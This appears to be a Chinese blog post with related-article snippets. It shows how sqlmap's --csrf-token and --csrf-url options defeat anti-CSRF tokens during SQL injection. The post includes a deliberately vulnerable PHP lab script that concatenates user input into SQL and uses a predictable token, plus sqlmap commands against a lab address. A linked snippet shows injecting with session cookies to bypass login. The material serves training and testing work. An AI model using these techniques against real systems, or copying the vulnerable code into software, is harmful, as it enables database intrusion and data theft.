sqlmap绕过CSRF检测进行注入

最新推荐文章于 2024-05-01 12:30:53 发布
原创 最新推荐文章于 2024-05-01 12:30:53 发布 · 2.7k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全漏洞

本文介绍了如何使用sqlmap绕过CSRF保护进行SQL注入攻击。通过创建一个包含anti-CSRF token的PHP脚本,展示了sqlmap的--csrf-token和--csrf-url参数如何帮助识别并利用漏洞。实验表明,即使在存在CSRF防御的情况下,sqlmap仍能自动更新token并检测到注入点。

最近在准备比赛,打sqlilabs时看了一下sqlmap的wiki,发现了–csrf-token和–csrf-url的参数,于是写了个php版本的bug试了一试。 同时也了解了一下大家对csrf注入的普遍做法:sqlmap+burp正则匹配,两相比较,还是sqlmap自带的功能比较方便。

写一个bug

CSRF的普遍防御方法是增加anti-csrf token,也就是一串不可预测的字符串。于是动手写了一个php版本防csrf的sqli脚本,这里写的并不规范,时间戳是可以被预测的,而且此脚本可以被绕过token检测,有兴趣可以琢磨一下。

 
 

<?php session_start(); //生成随机token $token = md5(time()); //获取name参数 $name = isset($_GET['name']) ? $_GET['name']: ''; //校验token if ($_GET['token'] == $_SESSION['token']) { //执行sql语句 $mysqli = new mysqli("127.0.0.1","root","root"); $mysqli->select_db("test"); if (!$mysqli->connect_error) { $query = "select * from admin where username = '$name'"; $result = $mysqli->query($query); if (!$mysqli->error) { while ($row = $result->fetch_row()) { echo $row; } } else { echo $mysqli->error; } } else { echo $mysqli->connect_error; } $mysqli->close(); } else { echo "no token"; } //以hidden表单元素的形式输出token echo "<input type=\"hidden\" name=\"token\" value=\"$token\">"; //刷新SESSION中token $_SESSION['token'] = $token; ?>

 

漏洞利用

sqlmap 中有这样两个参数

  • –csrf-token=”token_name”,指定随机化token的参数名

  • –csrf-url=”http://x.x.x.x/page”,指定获取token值的地址

如果没有指定–csrf-url,则默认从当前页面获取token。先来看看不指定token时,sqlmap的输出:

 
 

sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session

sqlmap根据关键字,识别出了token参数,但是默认不获取token,没有发现注入点。

再来看看指定token时的输出:

 
 

sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session --csrf-token="token"

确认了注入的存在,并且在wireshark中观察到token被sqlmap自动更新

在这个demo中,获取token的页面和注入点相同,在真实场景中,可能需要单独获取token值,这时要用到–csrf-url=<url>的参数。

所以使用以下命令,效果也是一样的:

 
 

sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session --csrf-token="token" --csrf-url="http://192.168.154.134/tokensql.php"

CanMeng'Blog
关注
csrf配合sqlmap绕过token
u011066706的专栏
04-17 6264
csrf token,每次提交一个页面都会改变的值。 网上很多教程都说burp结合sqlmap绕过csrf,个人感觉很麻烦,后看到外国牛人的writeup,介绍了sqlmap配合脚本脚本绕过csrf的限制,感觉比结合burp方便。首先我们需要写一个脚本,先获取csrf的值,然后结合sqlmap--eval参数就可以绕过csrf。原理其实很简单,分两步走,第一步获取页面csrf的值,然后以获得的值
SQL注入:Sql注入sqlmapapi介绍
caoxinjian423的博客
03-07 2005
sqlmap可谓是sql注入探测的神器,但是利用sqlmap测试SQL注入的效率很低,每一个url都需要手动测试。sqlmap的开发者新加了sqlmapapi.py,可以直接通过接口调用来操作,简化了sqlmap命令执行方式。 sqlmap api分为服务端和客户端,sqlmap api有两种模式,一种是基于HTTP协议的接口模式,一种是基于命令行的接口模式。 sqlmap源码下载地址:htt...
sqlmap使用教程(6)-注入技术拓展
fanmeng2008的博客
01-25 1765
选项--technique,可以用来指定SQL注入技术,默认为BEUSTQ。其中,B表示基于布尔盲注,E表示基于错误的盲注,U表示基于联合查询注入,S表示堆叠注入,T表示基于时间盲注,Q表示内联查询注入
利用sqlmap和burpsuite绕过csrf token进行SQL注入
weixin_30677073的博客
04-12 576
转载请注明来源:http://www.cnblogs.com/phoenix--/archive/2013/04/12/3016332.html 问题:post方式的注入验证时遇到了csrf token的阻止,原因是csrf是一次性的,失效导致无法测试。 解决方案:Sqlmap配合burpsuite,以下为详细过程,参照国外牛人的blog(不过老外讲的不是很细致,不适合我等小白)。 (英文好...
不用再找了,SQLMap基础命令合集版来了
南迪叶先森
07-14 3983
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! 一.SQLMap 1.SQLMap基本介绍 1.1)分析URL 判断可注入的参数 判断目标需要用哪种SQL注入 识别出目标数据库 根据命令,读取数据 1.2)注入方式 布尔盲注:基于SQL语句的比较判断的注入 时间盲注:基于返回结果是否延迟来判断是否存在注入 基于报错注入:通过报错来注入 联合查询注入:先 order by 查看字段数,再union注入。 堆查询注入:多条语句同时注入 注意: 1.可以设定HTTP(S)请求.
如何使用sqlmap绕过WAF进行SQL注入攻击
它的作用是保护 Web 应用程序免受常见的 Web 安全威胁,如 SQL 注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等攻击。 ## 1.2 WAF的作用和原理 WAF的主要作用是过滤恶意的 HTTP/HTTPS 请求和响应,以保护后端 Web ...
sqlmap基础使用手册 ─=≡Σ(((つ•̀ω•́)つ 知己知彼百战百胜 >web安全<
寻觅的博客
03-03 2584
文章目录sqlmap简介sqlmap特性sqlmap下载安装与启动sqlmap基础使用 sqlmap简介 顾名思义,sqlmap是一个自动化sql注入的开源的渗透工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。他有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。官方网址 如果...
sqlmap功能梳理
Starr
03-13 2946
文章目录1. Target连接数据库加载文件2. Requestcookiehost、UA等其它http头部认证代理延迟、超时与重置随机参数安全模式忽略其它3. Optimization4. Injection指定DBMS指定系统sqlmap机制开关无效值替换指定payload前后缀设置tamper绕过waf脚本5. Detection探测levelrisk页面比较6. sqli techniqueDNS攻击!!!二次注入7. 指纹8. Enumeration检索信息经典套路其它(部分):9. Brute
sqlmap对POST请求方式进行注入,POST请求包已经被保存为文本文件,那么sqlmap的函数有哪些
03-08
嗯,用户之前已经问过关于POST请求的SQL注入测试方法,现在他们想知道如果POST请求包保存为文本文件,sqlmap有哪些函数可以用。我需要确保回答准确,并且覆盖到用户可能关心的点。 首先,用户提到POST请求包已保存...
21、sqlmap参数详解
Web安全工具库
12-12 647
sqlmap参数详解: Usage: python sqlmap.py [options] Options(选项): -h, --help Show basic help message and exit 展示帮助文档 参数 -hh Show advanced help message and exit 展示详细帮助文档 参数 –version Show program’s version num...
Burpsuite+SQLMAP绕过Token保护(Burpsuite Macros应用)
whatday的专栏
03-10 4032
0×00 带有token 保护的应用 有这样的一个应用(自己写的一个, 后面会附上代码),你手动去注入的时候,发现是有注入点的 加上一个单引号,报错了 确实是有注入 但是用sqlmap跑的时候却没有 Burpsuite 重放失败 查看页面源代码 ,发现有个隐藏的token字段 说明后端对token进行了校
Sqlmap基础用法
wang720521的博客
01-28 6515
SQLmap 用法 用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库
sqlmap安装教程+遇到的错误及解决方法
weixin_51593721的博客
07-03 5673
sqlmap下载教程以及遇到的错误,电脑的python版本是python2.7与python3.10。
SQL 注入神器:SQLMap 参数详解
Flag少侠的博客
05-01 3904
这些选项可用于创建自定义用户定义函数--udf-inject 注入自定义用户定义函数--shared-lib=SHLIB 共享库的本地路径。
sqlmap用法详解
hirak0的博客
09-07 1万+
输出详细等级 选项:-v 该选项用于设置输出信息的详细等级,共有七个级别。默认级别为 1,输出包括普通信息,警告,错误,关键信息和 Python 出错回遡信息(如果有的话)。 0:只输出 Python 出错回溯信息,错误和关键信息。 1:增加输出普通信息和警告信息。 2:增加输出调试信息。 3:增加输出已注入的 payloads。 4:增加输出 HTTP 请求。 5:增加输出 HTTP 响应头 6:增加输出 HTTP 响应内容。 使用等级 2 能更好地了解 sqlmap 内部实现了什么,特别是在检测阶段
Sqlmap全参数详解
热门推荐
Breeze的博客
06-09 4万+
sqlmap全参数详解 sqlmap是在sql注入中非常常用的一款工具,由于其开源性,适合从个人到企业,从学习到实战,各领域各阶段的应用,我们还可以将它改造成我们自己独有的渗透利器。这款工具中,大大小小191个参数,在这篇文章中,我将一一介绍,其实很多参数我也没有使用过,所以有一些是自己的经验,还有一些是网上搜集的资料和sqlmap文档的记载。 参数简介 以下是使用-hh参数看见的全部的sq...
常见漏洞原理及修复方案
weixin_63560942的博客
03-29 2765
这里介绍一下常见的漏洞及其知识。仅用于个人记录学习,需要的时候反复观看,巩固基础。
超详细SQLMap使用攻略及技巧
DXCyber409的博客
08-15 3165
本文转载自:http://www.freebuf.com/sectool/164608.html sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1...
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 4015
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.youkuaiyun.com/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
sqlmap添加cookie绕过登录
最新发布
03-18
<think>好的,我现在需要帮用户解决如何使用sqlmap通过添加cookie绕过登录验证的问题。首先,我得回忆一下sqlmap的基本用法和相关参数。用户提到了引用中的几个例子,特别是引用[1]提到sqlmap使用Tamper脚本绕过WAF,引用[4]提到设置host头和随机agent,还有level参数。 用户的问题是使用cookie绕过登录认证。通常,网站登录后会生成一个cookie,服务器通过验证这个cookie来判断用户是否已登录。所以,如果sqlmap能带上有效的cookie,就可以在未登录的情况下进行注入测试,绕过登录页面。 首先,我需要确定sqlmap中如何添加cookie。常见的参数是--cookie,后面跟具体的cookie值。例如,在引用[4]中的例子用了--data和--random-agent,但没有直接提到cookie。不过根据sqlmap文档,使用--cookie "COOKIE_VALUE"应该可行。 然后,需要确保用户提供的cookie是正确的,并且有足够的权限访问需要注入的页面。可能还需要结合其他参数,比如--level,因为根据引用[4],level参数会影响sqlmap检测的强度,特别是当level设置为3时会检测User-Agent和Host头。因此,可能需要调整level值以确保cookie被正确发送。 接下来,考虑用户可能需要具体的示例。比如,用户想测试一个URL,假设是http://example.com/vuln.php?id=1,而登录后的cookie是PHPSESSID=abc123。那么命令应该是sqlmap -u "http://example.com/vuln.php?id=1" --cookie="PHPSESSID=abc123" --dbs。这里--dbs是获取数据库列表,用户可以根据需要替换其他参数,比如-D指定数据库,-T指定表,如引用[2]中的例子。 另外,可能需要处理cookie中的特殊字符,比如分号或空格,这时候需要将整个cookie用双引号括起来。同时,如果网站有CSRF保护或其他安全机制,可能需要使用Tamper脚本,如引用[1]提到的,或者结合--random-agent(如引用[4])来绕过检测。 还需要提醒用户注意cookie的有效性,确保在测试期间cookie没有过期。此外,使用--proxy参数配合Burp Suite等工具查看请求,确认cookie是否被正确注入,这可能帮助调试。 最后,总结步骤:使用--cookie参数添加cookie,可能需要调整level,必要时使用其他参数如--proxy或Tamper脚本。同时,给出具体示例,并提示常见问题,比如cookie格式和有效性检查。</think>以下是如何在sqlmap中使用cookie绕过登录认证的详细说明: ### 一、核心参数说明 1. `--cookie`参数:直接添加浏览器获取的cookie值,格式为`"name1=value1; name2=value2"` 2. `--cookie-del`参数:指定cookie分隔符(默认是`;`) 3. `--load-cookies`参数:从Netscape格式文件加载cookie 4. `--level`参数:建议设置为3或更高,确保检测所有HTTP头[^4] ### 二、具体操作步骤 #### 方法1:直接附加cookie ```bash sqlmap -u "http://vuln-site.com/product?id=1" --cookie="PHPSESSID=abcd1234; security=high" --dbs ``` * 通过浏览器开发者工具(F12)获取登录后的有效cookie * 需要保持cookie在有效期内 #### 方法2:配合POST请求 ```bash sqlmap -u "http://vuln-site.com/login" --data="username=admin&password=123" --cookie="JSESSIONID=xyz987" --level=3 ``` #### 方法3:使用代理验证 ```bash sqlmap -u "http://vuln-site.com/profile" --cookie="auth_token=abcdef" --proxy="http://127.0.0.1:8080" ``` * 通过Burp Suite等工具验证请求是否携带正确cookie ### 三、典型应用场景 1. 需要登录后才能访问的注入点 2. 基于cookie的会话管理系统 3. 具有CSRF防护的网站(需配合Tamper脚本)[^1] ### 四、注意事项 1. 使用`--batch`参数可跳过交互确认 2. 特殊字符需URL编码:`--cookie "name=value%20with%20space"` 3. 持久化存储cookie: ```bash sqlmap -u [URL] --cookie-file=/path/to/cookies.txt ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值